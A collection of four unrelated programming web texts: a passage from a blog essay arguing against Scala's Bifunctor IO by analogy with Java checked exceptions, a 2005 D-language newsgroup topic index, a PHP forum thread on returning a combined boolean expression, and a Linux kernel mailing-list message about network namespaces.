sealed trait BIO[E, A] { ??? }

Such a type parameterizes the error type in E. This is more or less like using Either to express the error, but as you shall see below, they aren't exactly equivalent:

opaque type BIO[E, A] = IO[Either[E, A]]

Or, in case you're throwing EitherT in the mix to make that less awkward:

import cats.data.EitherT

type BIO[E, A] = EitherT[IO, E, A]

Exposing the error type allows one to be very explicit at compile time about the error:

def openFile(file: File): BIO[FileNotFoundException, BufferedReader] =
  // Made up API
  BIO.delayE {
    try Right(new BufferedReader(new FileReader(file)))
    catch { case e: FileNotFoundException => Left(e) }
  }

def genRandomInt: BIO[Nothing, Int] =
  BIO.delayE(Right(Random.nextInt()))

You can see in the first function that we are very explicit about FileNotFoundException being an error that could happen, instructing readers that they should probably do error recovery. And in the second function we could use Nothing as the error type to signal that this operation can in fact produce no error (not really, but let's go with it 😉).

Available implementations:

- scalaz/ioeffect, the Scalaz 8 IO, available as a backport for Scalaz 7, by John A. De Goes and other Scalaz contributors
- cats-bio by Luka Jacobowitz, inspired by Scalaz 8's IO; he took Cats-Effect's IO and changed Throwable to E as a proof of concept
- Also worth mentioning is Unexceptional IO, Luka's precursor to his BIO implementation, inspired by Haskell's UIO, I think

Some articles on this subject:

- No More Transformers: High-Performance Effects in Scalaz 8, by John A.
De Goes
- Rethinking MonadError, by Luka Jacobowitz

The premise of these articles is that:

- our type system should stop us from being able to write nonsensical error handling code and give us a way to show anyone reading the code that we've already handled errors
- the performance of EitherT is bad and its usage more awkward

Naturally, I disagree with the first assertion and I don't think the second assertion is a problem 😀

The Problems of Java's Checked Exceptions #

While I think that the Bifunctor IO is a cool implementation that's pretty useful for certain people, or certain use cases, I believe that ultimately it's not a good default implementation, as it shares the same problems as Java's Checked Exceptions. Or, in other words, it's ignoring decades of experience with exceptions, since their introduction in LISP and then in C++, Java, C# and other mainstream languages. The web is littered with articles on why checked exceptions were a bad idea, and many of those reasons are also very relevant for an IO[E, A]. Here are just two such interesting articles:

- Checked exceptions I love you, but you have to go
- The Trouble with Checked Exceptions, an interview with Anders Hejlsberg

But let me explain in more detail …

1. Composition Destroys Specific Error Types #

Let's go with a more serious example:

import java.io._

def openFile(file: File): BIO[FileNotFoundException, BufferedReader] =
  // Made up API
  BIO.delayE {
    try Right(new BufferedReader(new FileReader(file)))
    catch { case e: FileNotFoundException => Left(e) }
  }

def readLine(in: BufferedReader): BIO[IOException, String] =
  BIO.delayE {
    try Right(in.readLine())
    catch { case e: IOException => Left(e) }
    finally in.close()
  }

def convertToNumber(nr: String): BIO[NumberFormatException, Long] =
  BIO.delayE {
    try Right(nr.toLong)
    catch { case e: NumberFormatException => Left(e) }
  }

What would be the type of a composition of multiple IO values like this?
for {
  buffer <- openFile(file)
  line   <- readLine(buffer)
  num    <- convertToNumber(line)
} yield num

That's right, you'll have a Throwable on your hands. And this is assuming that we've got a flatMap that widens the result to the most specific super-type, otherwise you'll have to take care of conversions manually, at each step.

Also note that our usage of Throwable is irrelevant for the problem at hand. You could come up with your own error type, but Throwable is actually more practical, because we can simply cast it. So, assuming a flatMap that doesn't automatically widen the error type of the result, what you'll have to deal with is actually worse:

for {
  buffer <- openFile(file).leftWiden[Throwable]
  line   <- readLine(buffer).leftWiden[Throwable]
  num    <- convertToNumber(line).leftWiden[Throwable]
} yield num

Not sure how people feel about this, but to me this isn't an improvement over the status quo, far from it, this is just noise polluting the code. And before you say anything in its defence, make sure the argument doesn't also apply to Java and everything you dislike about it 😉

2. You Don't Recover From Errors Often #

Imagine a piece of code like this:

for {
  r1 <- op1
  r2 <- op2
  r3 <- op3
} yield r1 + r2 + r3

So we are executing 3 operations in sequence and each of them can fail; we don't know which or how. Does it matter? Most of the time, you don't care. Most of the time it is irrelevant. Most of the time you can't even recover until later. Due to this uncertainty about which operations trigger errors and which don't, the premise of a Bifunctor IO is that we're forced to do attempt (error recovery) everywhere, but that is not a correct premise. The way exceptions work, and why they were introduced in LISP and later in C++, is that you only catch exceptions at the point where you can actually do something about it, otherwise it's fine to live in blissful ignorance.
Empirical evidence suggests that most checked exceptions in Java are either ignored or re-thrown, forcing people to write catch blocks that are meaningless and even error prone. You can even find some studies on the handling of checked exceptions in Java projects, although I'm unsure about how good they are. For example there's Analysis of Exception Handling Patterns in Java Projects, which states that:

"Results of this study indicate that most programmers ignore checked exceptions and leave them unnoticed. Additionally, it is observed that classes higher in the exception class hierarchy are more frequently used as compared to specific exception subclasses."

Consider that in the case of a web server, the recovery might be something as simple as showing the user an HTTP 500 status. HTTP 500 statuses are a problem, but only if they happen, and when they start to show up, you can then go back and fix what needs to be fixed.

Also remember the FileNotFoundException we mentioned above? Well, in most cases there's not much you can do about it. It's not like you've got much choice in the knowledge that the file is missing; most of the time the important bit is that an error, any error, happened. As Anders Hejlsberg, the original designer of C#, has argued, the most important part of exceptions are the finalizers, recovery being less frequent.

3. The Error Type is an Encapsulation Leak #

Let's say that we have this function:

def foo(param: A): BIO[FileNotFoundException, B]

By saying that it can end with a FileNotFoundException, we are instructing all callers, at all call sites, to handle this error as part of the exposed API. It's pretty obvious that FileNotFoundException can happen due to trying to open a file on disk that is missing. It's a very specific error, isn't it, the kind of error we're supposed to like if we're fans of EitherT or of the Bifunctor IO.
Well, what happens if we change foo to make an HTTP request instead, or maybe we turn it into something that reads a memory location? Now, all of a sudden, FileNotFoundException is no longer a possibility:

def foo(param: A): BIO[Unit, B]

This then bubbles down to all call sites, effectively breaking backwards compatibility, so everything that depends on your foo will have to upgrade and recompile. And as the author of foo you'll be faced with two choices:

- break compatibility
- keep lying to your users that foo can end with a FileNotFoundException and thus leave them with unreachable code, which is something that some Java libraries are known to have done

NOTE: there are cases in which you want to break binary compatibility when the error type changes. That is precisely the use case for which the Bifunctor IO or EitherT are recommended.
We aren’t doing it because adding type parameters to the types we are using leads to the death of the compiler, not to mention our own understanding of the types involved, plus usage becomes that much harder, because by introducing type parameters, values with different type arguments no longer compose without explicit conversion / widening, pushing a lot of complexity to the user. This is why EitherT is cool, even with all of its problems. It’s cool because it can be bolted on, when you need it, adding that complexity only when necessary. The Bifunctor IO[E, A] looks cool, but what happens downstream to the types using it? Monix’s Iterant for example is Iterant[F[_], A]. Should it be Iterant[F[_], E, A]? Or maybe Iterant[F[Throwable, _], A]? Or Iterant[F[_, _], E, A]? If I parameterize the error in Iterant, how could it keep on working with the current IO that doesn’t have a E parameter? And if Iterant works with IO[Throwable, _], then what’s the point of IO[E, A] anyway? Note that having multiple type parameters is a problem in Haskell too. Martin Odersky already expressed his dislike for type classes of multiple type parameters, such as MonadError and it’s pretty telling that type classes with multiple type parameters are not part of standard Haskell. 5. The Bifunctor IO Doesn’t Reflect the Runtime # I gave this piece of code above and I’m fairly sure that you missed the bug in it: def readLine(in: BufferedReader): BIO[IOException, String] = BIO.delayE { try Right(in.readLine()) catch { case e: IOException => Left(e) } finally in.close() } The bug is that in.close() can throw exceptions as well. Actually on top of the JVM even pure, total functions can throw InterruptedException for example. So what happens next? Well the Bifunctor IO cannot represent just any Throwable. By making E generic, it means that handling of Throwable is out. 
So at this point there are about 3 possibilities: - crash the process, which would be the default, naive implementation - your thread crashes without making a sound, logging to a stderr that gets redirected to /dev/null - use something like a custom Java Thread.UncaughtExceptionHandler, or Scalaz’s specific “fiber” error reporter to report such errors somewhere Also the astute reader should notice that by replacing the MonadError handling and recovery by a simple reporter there’s no way to do back-pressured retries. The nature of bugs is that many bugs are non-deterministic. Maybe you’re doing an HTTP request and you’re expecting a number in return, but it gives you an unexpected response - maybe it has a maximum limit of concurrent connections or something. When making requests to web services, wouldn’t it be better to give them some slack? Wouldn’t it be better to do retries with exponential backoff a couple of times before crashing? Or maybe use utilities such as TaskCircuitBreaker? Of course it is. And in the environments I worked on, such instances are very frequent and the processes have to be really resilient to failure and resiliency is built-in only when having the assumption that everything can fail for unknown reasons. In the grand scheme of things, the reason for why this is a huge problem is because IO should reflect the runtime, because IO effectively replaces Java’s call-stack. But the Bifunctor IO no longer does. In the words of Daniel Spiewak, who initiated the Cats-Effect project: “ The JVM runtime is typed to a first order. Which happens to be exactly what the type parameter of IO reflects. I'm not talking about code in general, just IO. IO is the runtime, the runtime is IO. ” “ The whole purpose of IO as an abstraction is to control the runtime. If you pretend that the runtime has a property which it does not, then that control is weakened and can be corrupted (in this case, by uncontrolled crashes). 
” “ IO needs to reflect and describe the capabilities of the runtime, for good or for bad. All it takes is an "innocent" throw to turn it all into a lie, and you can't prevent that. ” I agree with that and it shows which developers worked a lot in dynamic environments, this great divide being between those that think types can prove correctness in all cases and those that don’t. If you’re in the former camp, I think Hillel Wayne is eager to prove you wrong 😉 IO Cannot Be an Alias of the Bifunctor IO # You might be temped to say that: type IO[A] = BIO[Throwable, A] This is not true and it gave birth to, what I like to call, the great “No True Functor” debate and fallacy 😜 But details about it would take another article to explain. So it’s enough to say that cats.effect.IO and monix.eval.Task has got you covered in all cases, whereas a Bifunctor IO needs to pretend that developers on top of the JVM can work only with total functions, on top of an environment that actively proves you wrong, thus applying the “let it crash” philosophy on top of a runtime that makes this really expensive to do so (i.e. the JVM is not Erlang). This is another great divide in mentality, although I can see the merits of the arguments on the other side. In such cases it’s relevant by what kind of problems you got burned or not in the past I guess. Final Words # I am not saying that the Bifunctor IO[E, A] is not useful. I’m pretty sure it will prove useful for some use-cases, the same kind of use-cases for which EitherT is useful, except with a less orthogonal design. Well you gain some performance in that process, although when you’re using EitherT it’s debatable whether it matters for those particular use cases. 
What I am saying is that: - let’s not ignore the two decades of experience we had with Java’s checked exceptions, preceded by another two decades of experience with exceptions in other languages EitherTis useful because it can be bolted on when the need arises, or otherwise it can be totally ignored by people like myself, so let’s not throw the baby with the bath water I do think that IO[E, A] will be a great addition to the ecosystem, as an option over the current status quo. Scala is a great environment. That’s all.
https://alexn.org/blog/2018/05/06/bifunctor-io/
news.digitalmars.com - digitalmars.D.learn

Dec 31 2005 Why can I convert a d_time to int without error? (21)
Dec 30 2005 final variable (7)
Dec 28 2005 How do I fix the spawnvp link bug under Linux? (6)
Dec 28 2005 Can D perform tilde expansion in paths? (7)
Dec 28 2005 Import Conflicts (12)
Dec 27 2005 std.stdio not found? (4)
Dec 27 2005 Difference by objekt initialisation (2)
Dec 24 2005 How to terminate a file in use? (9)
Dec 23 2005 desired side effect (6)
Dec 22 2005 profiling (2)
Dec 21 2005 Protective Attributes and `alias' (1)
Dec 20 2005 static virtual members (7)
Dec 20 2005 Ddoc examples (1)
Dec 18 2005 Strange behaviour of threads (3)
Dec 16 2005 Get no MAPFILE (8)
Dec 13 2005 win32 build error (4)
Dec 13 2005 Ddoc example section (1)
Dec 11 2005 Templates ~ best way to limit types? (9)
Dec 11 2005 old newsgroup attachments (5)
Dec 10 2005 casting a type to a void* (8)
Dec 08 2005 Radically different performance on same hardware. (2)
Dec 07 2005 compile time variations (10)
Dec 07 2005 real time (5)
Dec 06 2005 Newbie needs help with getting (what should be a) simple program to compile... (5)
Dec 05 2005 Code-coverage (6)
Nov 30 2005 Symbol to char[] (11)
Nov 30 2005 function pointer vs. delegate (6)
Nov 29 2005 std.string.atoi should throw exception (3)
Nov 26 2005 prototypes for signal() under linux? (2)
Nov 26 2005 Converting pointer to struct in struct declaration from C to D (7)
Nov 26 2005 properties of pointers (1)
Nov 25 2005 Linking DMD objs with Microsoft's link.exe (6)
Nov 23 2005 types of exceptions (3)
Nov 23 2005 Template issue? (3)
Nov 23 2005 The other topic: character literal types (1)
Nov 21 2005 compile/link problems(real newbie question) (9)
Nov 21 2005 How to retrieve template parameters (7)
Nov 21 2005 Slicing vs memcpy (16)
Nov 19 2005 linking C++ to D on windows troubles... (10)
Nov 18 2005 int, double and divide by zero (3)
Nov 18 2005 combination attributes of both protected and package (2)
Nov 16 2005 16 core boards (64b) available (2)
Nov 15 2005 how to read a line from stdin ? (3)
Nov 15 2005 Link errors with lib files (7)
Nov 14 2005 strange problem, need ideas for debugging... (7)
Nov 14 2005 typeinfo[] construction (11)
Nov 11 2005 popen (3)
Nov 10 2005 Stream and File understanding. (32)
Nov 08 2005 Threads and concurrency (1)
Nov 08 2005 Threads and concurrency (19)
Nov 08 2005 Death by concurrency (12)
Nov 07 2005 GDC question (1)
Nov 04 2005 How to share 'version' info between files (5)
Nov 02 2005 Simulating enum inheritance? (2)
Nov 02 2005 DDOC with class templates (4)
Oct 30 2005 rmi library (3)
Oct 28 2005 a slew of questions about D... (22)
Oct 25 2005 The power of static if! (A bit of fun) (36)
Oct 24 2005 Buffered output (6)
Oct 24 2005 Entity name shadowing: valid or not ? (3)
Oct 24 2005 Access to serial ports in Windows (26)
Oct 21 2005 Is heap scanning done conservatively? (2)
Oct 21 2005 How to handle public: inside DDOC example section ? (4)
Oct 20 2005 Ddoc question (2)
Oct 20 2005 Exception handling - the basics (13)
Oct 18 2005 Undocumented string functionality? (11)
Oct 17 2005 XOR a bunch of data (4)
Oct 14 2005 Thread.getThis() (4)
Oct 14 2005 DDoc macro questions (usage)... (10)
Oct 12 2005 readf? (15)
Oct 10 2005 Duping an associative array (1)
Oct 10 2005 Phobos - system.d (5)
Oct 06 2005 requesting a few pointers (5)
Oct 03 2005 Ddoc embedded D source (1)
Oct 02 2005 opSlice question (3)
Oct 02 2005 DDOC line breaks (2)
Oct 01 2005 redirect input on windows (4)
Oct 01 2005 Enums - no "out of range" checking? (4)
Oct 01 2005 DMD's inline switch (3)
Oct 01 2005 Rectangular Array Initialization (2)
Oct 01 2005 Preprocessing with Build (5)
Sep 30 2005 Class member functions (10)
Sep 28 2005 Box data type (15)
Sep 28 2005 std.math.round() - doc bug? (5)
Sep 25 2005 Pointers and deleting objects (22)
Sep 23 2005 Get current object in method (3)
Sep 22 2005 portability tips (1)
Sep 21 2005 winsamp refactored (1)
Sep 20 2005 variable declaration question (5)
Sep 20 2005 Questions on accessing D objects from C (1)
Sep 20 2005 GC finalisation (5)
Sep 19 2005 DDoc richness (10)
Sep 18 2005 D and GMP (4)
Sep 17 2005 Undefined Windows function (11)
Sep 16 2005 Need help with .h conversion (4)
Sep 14 2005 Re: Wanted: GDB-style debugging (9)
Sep 14 2005 Assign values to static array (3)
Sep 13 2005 [D newbie - long] A lot of questions about D: Binary Modules, Metadata, Memory Management (11)
Sep 13 2005 Another question about making a .lib file (8)
Sep 13 2005 Making a .lib in D (5)
Sep 12 2005 how to... make a D library and distribute? (4)
Sep 11 2005 sort keys in an associative array? (4)
Sep 10 2005 C headers to D for opaque data types (2)
Sep 09 2005 harmonia ocumentation? (4)
Sep 09 2005 File reading and interpretation (2)
Sep 08 2005 Displaying international characters (3)
Sep 06 2005 libarary haeder (33)
Sep 05 2005 pointer to member function (6)
Aug 31 2005 unformatted output (4)
Aug 31 2005 D license (18)
Aug 31 2005 useful mixin (2)
Aug 30 2005 DirectX9 D3D Tutorials (3)
Aug 29 2005 std.boxer type query (6)
Aug 25 2005 is this a bug? nested function visibility (2)
Aug 22 2005 .length and lvalue? (4)
Aug 21 2005 Associative Array w/ Boxes. (6)
Aug 20 2005 What on earth is happening? Mutual dtors (4)
Aug 20 2005 Uint/Int max/min functions/templates. (1)
Aug 20 2005 Implicit conversion of int to uint (2)
Aug 20 2005 opIndexAssign Question (3)
Aug 19 2005 How to copy an object? (14)
Aug 18 2005 FileException vs. Exception (5)
Aug 17 2005 Null variadic parameter.
(4) Aug 17 2005 painting arrays over arrays (3) Aug 17 2005 10's of threads + network == segfault (sample code) (13) Aug 17 2005 understanding the -profile output (1) Aug 17 2005 acquiring the contents of environment variables (7) Aug 16 2005 Std.boxer toString() w/ Objects or Structs. (7) Aug 15 2005 d threads primer (6) Aug 14 2005 Referring to labels in asm block (1) Aug 14 2005 Variadic opIndexAssign (4) Aug 14 2005 Using keywords as elements of module names? (3) Aug 13 2005 constructors of nested classes (1) Aug 13 2005 negative assertion support for RegExp? (8) Aug 13 2005 understanding string suffixes (12) Aug 12 2005 Inheriting Base Constructors? (4) Aug 12 2005 Need help on working with TypeInfo, typeid(), and typeof() (6) Aug 11 2005 Compile on Cygwin with gdc (3) Aug 10 2005 Api calls... (5) Aug 10 2005 Linker doesn't find a Win32 API function (5) Aug 09 2005 UTF8 Encoding: Again (11) Aug 09 2005 Miscelleanous Questions (6) Aug 09 2005 Converting C/C++ bit fields... (9) Aug 08 2005 Compiling D to x86 assembly (1) Aug 08 2005 Does D support tail recursion? (2) Aug 08 2005 Does D optimize for tail recursion (1) Aug 08 2005 Error: Stream is not seekable ERROR with v .129 (4) Aug 08 2005 Symbol Undefined (11) Aug 08 2005 export to .h (1) Aug 07 2005 D default directory module? (7) Aug 06 2005 undefined label (2) Aug 06 2005 Assert Error (3) Aug 06 2005 Small question on: typedef get opCall; (4) Aug 06 2005 Range and set. (2) Aug 05 2005 OpenSSL? (2) Aug 05 2005 Array.sort understanding need (5) Aug 04 2005 error msg not understood (2) Aug 04 2005 Linking dynamic D library with C. (6) Aug 04 2005 foreach annoyance (18) Aug 03 2005 Which "if" choice is faster? (22) Aug 02 2005 remaping arrays (6) Aug 02 2005 Equivalent to C++ iostream cout (3) Aug 02 2005 system("DOS COMMAND PROMPT"); (5) Aug 01 2005 Variadic arguments transmission (6) Aug 01 2005 Implementation of char[] std.string.toString(char) (9) Aug 01 2005 Are constructors thread-safe? 
(4) Jul 31 2005 Template alias parameters (3) Jul 30 2005 Numerical Index in Associative Foreach (11) Jul 27 2005 Array of Associative arrays (7) Jul 27 2005 macro help (5) Jul 24 2005 Module name clashes (3) Jul 24 2005 Memoize function in D (34) Jul 23 2005 (structed un)named enum (1) Jul 22 2005 implicit conversion of reference to bool? (4) Jul 22 2005 Help: Types Conversion libraries, where are thou? (4) Jul 22 2005 Error: Access Violation (2) Jul 21 2005 Howto call foreach for void[char[]] (3) Jul 20 2005 Can structs be used with associative arrays? (12) Jul 19 2005 another std.path problem: getBaseName (9) Jul 14 2005 void as Initializer? (4) Jul 11 2005 possible d error? (4) Jul 09 2005 std.path.getDirName is not working correct? (10) Jul 05 2005 Opening a file for writing (5) Jul 05 2005 threads (5) Jul 04 2005 How to check for a pre-existing type? (2) Jul 01 2005 Removing an array's last item(s)? (10) Jun 27 2005 size of C enum (3) Jun 27 2005 A newsgroup accessible by google groups (4) Jun 27 2005 run time dll loading (4) Jun 26 2005 Problem derrivering nested in child class from nested in parent. (12) Jun 25 2005 A couple of questions re structs (4) Jun 23 2005 Clarification on aa.remove(key) (3) Jun 23 2005 Bind to any port and get it after binding. (2) Jun 23 2005 Howto "pass" exception. (2) Jun 23 2005 How-to programmatically compose email? (4) Jun 22 2005 struct vs. internal class (6) Jun 21 2005 Casting (8) Jun 21 2005 std.string.toString() methods cause confusion (6) Jun 20 2005 Compiling + Linking : please check ! (4) Jun 19 2005 Array indexing & typedef (26) Jun 19 2005 Compiling+Linking problem : some black magic (4) Jun 19 2005 &this access violation (3) Jun 17 2005 error line number off by 1? Or not? 
(3) Jun 17 2005 Calling method on new instance of class (3) Jun 16 2005 Interfacing to C arrays of unknown size (6) Jun 15 2005 LOL - int array literals (and an idea) (2) Jun 14 2005 cooperation between D and C (15) Jun 14 2005 std.socket + sending of structs (8) Jun 12 2005 reading console in an 'endless' loop (4) Jun 10 2005 Error: undefined identifier remove (2) Jun 09 2005 Anonymous nested classes (7) Jun 07 2005 structs and bits (7) Jun 07 2005 Daemon app in D (15) Jun 05 2005 confused about appending arrays... (2) Jun 05 2005 Overload In (7) Jun 04 2005 No ZipArchive property 'opApply' (2) Jun 04 2005 should 'template MyT (T : Object)' match interface-types? (1) Jun 04 2005 templates in libraries (6) Jun 04 2005 inout and foreach elements (4) Jun 03 2005 operator* (2) Jun 02 2005 why is std.boxer.Box a struct and not a class? (10) Jun 01 2005 communicating with a com port (8) Jun 01 2005 calling another program (2) May 31 2005 reference error? (7) May 31 2005 about operators (5) May 30 2005 correct way to set a dynamic 2d array? (6) May 30 2005 collection classes (2) May 30 2005 DbC vs. argument checking (19) May 29 2005 typeid(SomeClass) == typeid(AnotherClass) -- what's the deal? (6) May 29 2005 Bits in Int / short / etc (8) May 28 2005 Inner class (5) May 28 2005 iftype on struct or class? (7) May 27 2005 C Macro to D (3) May 27 2005 Operators - be careful what you ask for (1) May 26 2005 Calling D code from C (3) May 25 2005 Using Win32 console functions in D (5) May 25 2005 What .brf files are for? (2) May 24 2005 Can we turn off array's bounds-check? (10) May 24 2005 debug d code (2) May 22 2005 D(...) to call another D(...) (7) May 19 2005 Adding include directories in sc.ini (5) May 19 2005 std.loader and libs (2) May 19 2005 strings (10) May 18 2005 Overriding debug levels (1) May 18 2005 Debug Statement (1) May 18 2005 Documentation/InputStream bug? 
(3) May 18 2005 Template Stream Problems (5) May 18 2005 amd64 (3) May 18 2005 Headers, segfaults and other pains part II (1) May 18 2005 Header headaches part 2 (13) May 18 2005 Headers, segfaults and other pains PART I (1) May 17 2005 Segfaults, C-headers and other pains (1) May 17 2005 1 more header file conversion question (5) May 17 2005 "length" Symbol Conflict (4) May 16 2005 MD5 -- My First D Class (comments, please) (1) May 16 2005 SegFault from Unit-Test (4) May 16 2005 Memory management and Html embeded (15) May 15 2005 Help converting a headerfile to D (4) May 15 2005 inline assembler - far jump (3) May 15 2005 recls_time_t to d_time? (5) May 14 2005 MinWin with dmd 0.121 (8) May 14 2005 Unit tests for libraries (4) May 13 2005 D f(...) to C f(va_list) (7) May 12 2005 int to bit (6) May 11 2005 Pseudo member functions (11) May 11 2005 Poor error messages (3) May 11 2005 linking with a C library (6) May 09 2005 Meaning of in, out and inout (5) May 09 2005 bit vs. bool?! (8) May 09 2005 feedback wanted: DLlist.d - doubly linked list implementation in (11) May 09 2005 File / BufferedFile / MmFile (2) May 09 2005 build preprocessor ... (2) May 08 2005 Questions about destructors, threads, SDL, OpenGL and GC (3) May 06 2005 wchar[] literals (5) May 05 2005 Structure of D Applications (2) May 04 2005 D Documentation (8) May 03 2005 Still can't find function definitions in the Libs (4) May 01 2005 Designing a DLL for a non-GC language (2) Apr 30 2005 std.stream.stdin.eof() and pipes - do they work together? (3) Apr 30 2005 SDL with D (2) Apr 29 2005 installation on Win32 (42) Apr 29 2005 portability questions (3) Apr 28 2005 Integrate Platform SDK with << D >> language (1) Apr 26 2005 Undefined symbol when linking correct library (3) Apr 26 2005 Problem with imports in class hierarchy (5) Apr 25 2005 AA with objects on windows (6) Apr 24 2005 D libraries (DLLs and LIBs) from C (10) Apr 23 2005 mixins: declaration scope (2) Apr 22 2005 corrupt stack? 
gdb bt (3) Apr 22 2005 How to get whole env. (5) Apr 22 2005 RTF formatting (3) Apr 21 2005 Compiler not recognizing certain structs, types? (10) Apr 21 2005 Name mangling (3) Apr 19 2005 Windows 2000 Service and D (8) Apr 19 2005 Passing array to ctor (3) Apr 18 2005 Dynamic arrays, Associative arrays, etc... (13) Apr 17 2005 capturing process output on windows (20) Apr 17 2005 problem understanding struct sizes v class sizes (7) Apr 17 2005 Is there something special about globals I don't understand? (4) Apr 17 2005 dsource and svn (3) Apr 17 2005 handling module ctor exceptions (5) Apr 16 2005 class member access (6) Apr 16 2005 Access Violation: Maybe it's my fault? (4) Apr 15 2005 Accessing class members (12) Apr 15 2005 Error 42: (10) Apr 14 2005 Storing classes in an array. (4) Apr 13 2005 Function and variable assignment (2) Apr 12 2005 interface idispatch (21) Apr 11 2005 calling C functions findfirst etc (15) Apr 09 2005 InBuffer (8) Apr 09 2005 Does anyone have examples of GTK code in D? (20) Apr 09 2005 Any good approach for making plug-in? (1) Apr 09 2005 strtok? (3) Apr 08 2005 Linking problems with mintl (4) Apr 07 2005 how to debug ? (1) Apr 07 2005 GC and big non-binary trees (5) Apr 07 2005 Reentrant Lock (3) Apr 07 2005 Changing the size of an foreach() argument (2) Apr 06 2005 Templates + protection attributes problem (4) Apr 05 2005 garbage collector in seperate thread? (6) Apr 04 2005 std.date.parse not very smart (4) Apr 04 2005 Time and space, physical values? (1) Apr 04 2005 Threads not independent... (13) Apr 04 2005 phobos->RegExp (4) Apr 04 2005 sscanf() and using \ in format = no workie? (6) Apr 01 2005 How to convert va_start macro to D function? (3) Mar 31 2005 toInt() to critical of string input? (3) Mar 31 2005 Filename expansion under DOS box? (20) Mar 31 2005 sscanf() and string "reads" via %s? (9) Mar 31 2005 version() used in multiple special cases? 
(2) Mar 31 2005 typeid(obj) vs obj.typeinfo (1) Mar 31 2005 AA as lvalue (7) Mar 30 2005 Virtual functions and modules (1) Mar 30 2005 New feature for std.string suggestion: locate() (3) Mar 30 2005 calling dll functions (2) Mar 30 2005 writef and structs (3) Mar 30 2005 How to port a C++ library? (8) Mar 30 2005 Can I convert function to delegate ? (5) Mar 29 2005 C's sscanf in D? (2) Mar 29 2005 Copying int[] from dynamic to static arrays? (2) Mar 29 2005 array length is an unsigned value (1) Mar 29 2005 writefln not liking % in strings!? (3) Mar 29 2005 Chars ASCII 128+ in Literals? (8) Mar 29 2005 Stack or heap? (11) Mar 27 2005 void[] or ubyte[] ? (4) Mar 27 2005 Reading large files, writing large files? (22) Mar 27 2005 Object reference comparisons. (5) Mar 27 2005 Associative Arrays - Initialize via [ value, value, ...] ? (4) Mar 26 2005 3D Arrays - Non-block Arrays possible? (3) Mar 26 2005 Function overloading (not working as expected) (2) Mar 26 2005 foreach and changing the aggregate's values? (3) Mar 25 2005 Access violation using append/concatenate operator "~" (8) Mar 25 2005 toString conflic importing std.string & std.date? (4) Mar 25 2005 Good way to get a file's datestamp? (5) Mar 25 2005 write and read in one line (4) Mar 24 2005 converting from macro to function (4) Mar 24 2005 Changing to UTF-8 (6) Mar 23 2005 writef / writefln and passing output to a file (4) Mar 23 2005 Destructors for structs (7) Mar 22 2005 Window procedure declaration (13) Mar 22 2005 Formatting strings into columns via format? (1) Mar 22 2005 Error runtime feedback of D too short? (3) Mar 22 2005 Initializing global arrays in modules via this()? (4) Mar 22 2005 String concat ~ with auto toString() feature? (6) Mar 21 2005 dchar counting in a char[] (2) Mar 21 2005 how to set struct alignof? (5) Mar 21 2005 Counting the number of elements in int[] ? (5) Mar 21 2005 Concat or add ~. Is this a bug? 
(5) Mar 21 2005 program software versions (12) Mar 21 2005 Playing const char[]s into an Array? (6) Mar 21 2005 getAttributes (5) Mar 21 2005 Why does this work? (2) Mar 20 2005 String Parsing with \" in a ".." text line (25) Mar 20 2005 Opening, reading and writing to files in binary mode (5) Mar 20 2005 is there a way to enforce module 'namespace' semantics? (14) Mar 20 2005 Accessing class member methods (5) Mar 20 2005 Wrong Learn link? (3) Mar 20 2005 Reading and writing a text file (11) Mar 19 2005 Read text file, line by line? (22) Mar 18 2005 Win32: Console in GUI application (2) Mar 18 2005 "Error: Error: conversion 8," (7) Mar 17 2005 Is there any Libjpeg D port? (4) Mar 17 2005 Testing for empty/indefinded Stings? (5) Mar 17 2005 Timing Code - Read Time-Stamp Counter + Message? (2) (1) Mar 17 2005 copy char to char[] (7) Mar 17 2005 Timing Code - Read Time-Stamp Counter + Message? (4) Mar 16 2005 D Tutorials (16) Mar 16 2005 Copy-on-Write using toupper() source example? (6) Mar 16 2005 Fast Memory Allocation Strategy (9) Mar 16 2005 Almost first post (1) Mar 16 2005 Announcing new newsgroups (2) Mar 16 2005 Test (4) Other years: 2017 2016 2015 2014 2013 2012 2011 2010 2009 2008 2007 2006 2005
http://www.digitalmars.com/d/archives/digitalmars/D/learn/index2005.html
I came across a method today that has the following at the end of it:

return in_array($id, $arr[0]) && in_array($this->id, $arr[1]);

Now help me understand this... That line basically says, "return TRUE if BOTH in_array functions return TRUE," correct? Otherwise, I'm assuming it would return FALSE because no other return statements exist in the method. Is the form that's used here done a lot? I've never seen it done this way... Usually, you only see a singular return statement.

Hi,

Yeah, you're right about what it does. As long as the expression after the return statement only evaluates to a single value then PHP won't have a problem with it.

- in_array returns a boolean -- true if the element is in the array, false if it's not
- expression && expression "returns" (or evaluates to) a boolean -- true if both expressions are true, false if either or both expressions are false

So in total the function returns a boolean -- true if both elements are in their respective arrays, or false if either or both elements aren't in their respective arrays. This form isn't used a whole lot, but you do see it every once in a while.

Another thing I'm reminded of by looking at this is that the following also confuses people a lot:

class Something {
    public $somevar;

    public function foo() {
        return $this->somevar = 5;
    }
}

which assigns and returns at the same time (compare to if (($pos = strpos($haystack, $needle)) !== false), which can be similarly confusing).

For a complete list of logical operators like && see

For readability, I'd have wrapped it in a set of parentheses (just to avoid potential confusion of precedence; does it evaluate as (return function1()) && function2() or return (function1() && function2())), but yeah...

This topic is now closed. New replies are no longer allowed.
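The combined-boolean-return idiom discussed above is not PHP-specific. As an illustration only (function and variable names are mine, not from the thread), here is the same pattern sketched in Python, where `in` plays the role of in_array and `and` plays the role of &&:

```python
def both_present(first_id, second_id, arr):
    # Equivalent of: return in_array($id, $arr[0]) && in_array($this->id, $arr[1]);
    # The whole boolean expression is evaluated first, then its single
    # True/False result is returned.
    return first_id in arr[0] and second_id in arr[1]

print(both_present(1, 5, [[1, 2], [4, 5]]))  # True: both ids found
print(both_present(1, 9, [[1, 2], [4, 5]]))  # False: second id missing
```

As in PHP, wrapping the returned expression in parentheses changes nothing semantically, but can make the precedence obvious to a reader.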
http://community.sitepoint.com/t/understanding-the-logic-with-2-returns/30416
> no problem here, but I think we will need another one,
> or some smart way to do the network isolation (layer 3)
> for the network namespace (as alternative to the layer 2
> approach) ...

My feeling (Dmitry and Daniel can correct me) is that it will be addressed with an unshare-like flag: NETNS2 and NETNS3.

> as they are both complementary in some way, I'm not sure
> a single space will suffice ...

hmm, so you think there could be 2 different namespaces for network to handle layer 2 or 3. Couldn't that be just a sub part of net_namespace.

C.

-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo@vger.kernel.org
More majordomo info at
read the FAQ at
https://lkml.org/lkml/2006/11/22/100
